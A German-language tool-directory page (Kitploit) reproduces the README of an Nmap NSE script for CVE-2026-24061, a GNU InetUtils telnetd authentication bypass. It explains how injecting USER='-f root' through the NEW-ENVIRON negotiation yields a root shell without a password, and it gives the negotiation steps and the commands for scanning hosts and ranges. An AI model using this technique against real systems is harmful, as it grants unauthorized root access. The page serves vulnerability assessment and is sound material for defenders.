Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061-NSE — Das Skript führt eine vollständige Telnet-Aushandlung durch, die die exakte Byte-Sequenz einer echten Telnet-`-a`-Client-Sitzung nachbildet. | Kitploit
Tools/GitHubGitHub/hd0x01/cve-2026-24061-nse
SchwachstellenscannerExploitationNetzwerksicherheitPenetrationstestsAuthentifizierung
GitHubhd0x01/cve-2026-24061-nse

CVE-2026-24061-NSE

Das Skript führt eine vollständige Telnet-Aushandlung durch, die die exakte Byte-Sequenz einer echten Telnet-`-a`-Client-Sitzung nachbildet.

Repository anzeigen
17vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24061 — GNU InetUtils telnetd Authentifizierungsumgehung

Nmap NSE-Erkennungsskript

Nmap NSE CVE CVSSv3 License


Übersicht

Dieses Nmap-NSE-Skript erkennt CVE-2026-24061, eine Authentifizierungsumgehungs-Schwachstelle in GNU InetUtils telnetd der Versionen 1.9.3 bis 2.7.

Durch das Senden einer manipulierten USER-Umgebungsvariable der Form -f <Benutzername> während der Telnet-Optionsaushandlung kann ein nicht authentifizierter Angreifer eine Shell mit den Rechten des angegebenen lokalen Benutzers erhalten — einschließlich root — ohne ein Passwort anzugeben.

Verwendungszweck: Nur für autorisierte Penetrationstests und Schwachstellenbewertungen.
Die Ausführung dieses Skripts gegen Systeme ohne ausdrückliche schriftliche Genehmigung ist illegal.


Schwachstellendetails

FeldWert
CVE-IDCVE-2026-24061
BetroffenGNU InetUtils telnetd 1.9.3 – 2.7
CVSSv3-Wertung9.8 Kritisch
VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
TypAuthentifizierungsumgehung (CWE-287)
Offenlegung2026-01-01

So funktioniert es

GNU InetUtils telnetd verwendet die Telnet-NEW-ENVIRON-Option (RFC 1572), um Umgebungsvariablen vom Client während der Aushandlungsphase zu empfangen. Das login(1)-Programm wird anschließend mit diesen Variablen aufgerufen.

Die Schwachstelle entsteht, weil telnetd die USER-Variable direkt an login übergibt, ohne sie zu bereinigen. Das login-Programm unter Linux akzeptiert ein -f <Benutzer>-Flag mit der Bedeutung „vorauthentifiziert, kein Passwort prüfen". Durch das Injizieren von USER="-f root" über die NEW-ENVIRON-Nutzlast umgeht der Angreifer die Authentifizierung vollständig.

Client → Server:  IAC SB NEW-ENVIRON IS  VAR "USER"  VALUE "-f root"  IAC SE
Serverantwort:    startet login -f root  →  Root-Shell, kein Passwort erforderlich

Skriptdetails

FeldWert
Dateinametelnet-vuln-cve-2026-24061.nse
Kategorienvuln, exploit, intrusive
PortTCP/23 (telnet)
Getestet aufNmap 7.94 / 7.98, Windows & Linux

Erkennungsmethode

Das Skript führt eine vollständige Telnet-Aushandlung durch, die die exakte Bytesequenz einer echten telnet -a-Client-Sitzung nachbildet (rekonstruiert aus einem Wireshark-Mitschnitt):

  1. Empfangen des anfänglichen IAC-Bursts des Servers (DO TTYPE, DO TSPEED, DO ENVIRON, …)
  2. Antworten mit der vollständigen Client-Fähigkeitsankündigung (WILL TTYPE, WILL LINEMODE, …)
  3. Abschließen der Sub-Aushandlungsrunde (SB TSPEED, SB ENVIRON, SB TTYPE)
  4. Injizieren der manipulierten USER='-f <Benutzer>' in die NEW-ENVIRON-IS-Nutzlast
  5. Abschließen der WILL ECHO / DO BINARY / WONT LINEMODE-Sequenz
    (kritisch — ohne diese kann telnetd die PTY-Einrichtung nicht abschließen)
  6. Prüfen, ob der Server eine Login-Shell-Eingabeaufforderung ohne Passwortabfrage sendet

Ergebniszustände:

ZustandBedeutung
EXPLOITShell-Eingabeaufforderung empfangen — Umgehung bestätigt
LIKELY_VULNENV-Nutzlast akzeptiert, keine Passwortabfrage, aber keine Shell-Eingabeaufforderung
NOT_VULNPasswortabfrage gesehen, oder Aushandlung nicht abgeschlossen

Installation

Linux

# In das Nmap-Skriptverzeichnis kopieren
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/

# Skriptdatenbank aktualisieren
sudo nmap --script-updatedb

Windows

# In das Nmap-Skriptverzeichnis kopieren (Pfad bei Bedarf anpassen)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"

# Skriptdatenbank aktualisieren (als Administrator ausführen)
nmap --script-updatedb

Verwendung

Grundscan (Standardbenutzer: root)

nmap -p 23 --script telnet-vuln-cve-2026-24061 <Ziel>

Anderen Benutzer angeben

# Kurzform
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali <Ziel>

# Mittlere Form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali <Ziel>

# Vollständig qualifiziert
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
    --script-args telnet-vuln-cve-2026-24061.user=kali <Ziel>

IP-Bereich scannen

nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24

Ausführliche / Debug-Ausgabe

nmap -p 23 --script telnet-vuln-cve-2026-24061 -v  <Ziel>   # ausführlich
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d  <Ziel>   # Debug
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 <Ziel>   # vollständige Hex-Ablaufverfolgung

Beispielausgabe

Verwundbarer Host

PORT   STATE SERVICE
23/tcp open  telnet
| telnet-vuln-cve-2026-24061:
|   VULNERABLE:
|   GNU InetUtils telnetd Authentifizierungsumgehung
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2026-24061
|     Risk factor: Critical  CVSSv3: 9.8
|     Description:
|       Der telnetd-Dienst in GNU InetUtils (1.9.3 - 2.7) ermöglicht
|       eine Authentifizierungsumgehung über eine manipulierte USER-Umgebungsvariable.
|       Das Senden von '-f <Benutzer>' führt zu einer nicht authentifizierten Login-Shell.
|     Extra information:
|       Authentifizierung umgangen: Shell-Eingabeaufforderung nach dem Injizieren von
|       USER='-f root' empfangen -- keine Passwortabfrage wurde angezeigt.
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2026-24061
|       https://github.com/JayGLXR/CVE-2026-24061-POC
|_      https://github.com/SafeBreach-Labs/CVE-2026-24061

Nicht verwundbarer Host

PORT   STATE SERVICE
23/tcp open  telnet

(keine Skriptausgabe — NOT_VULN ist standardmäßig still, gemäß Nmap-Konvention)


Skriptargumente

ArgumentAlias(es)StandardBeschreibung
telnet-vuln-cve-2026-24061.usertelnet-user, userrootBenutzername, der über -f injiziert werden soll

Technische Hinweise

Warum WONT LINEMODE kritisch ist

GNU InetUtils telnetd verwendet die Linemode-Aushandlung (RFC 1184), um den Terminal-E/A-Modus zu bestimmen. Der Server sendet DO LINEMODE früh in der Aushandlung, und der Client antwortet zunächst mit WILL LINEMODE. Nach dem ENV-Nutzlast-Austausch sendet der Server WILL ECHO gefolgt von DO BINARY. An diesem Punkt muss der Client mit WONT LINEMODE antworten, um den Zeichen-für-Zeichen-Modus zu signalisieren — nur dann kann telnetd die PTY-Einrichtung (ioctl TIOCSWINSZ) abschließen und login starten. Ohne diesen Schritt protokolliert der Server peer died: Inappropriate ioctl for device und beendet die Verbindung.

NSE-Socket-API

Die NSE-Socket-API von Nmap unterscheidet sich von den Standard-Lua-Socket-Konventionen:

Tool herunterladen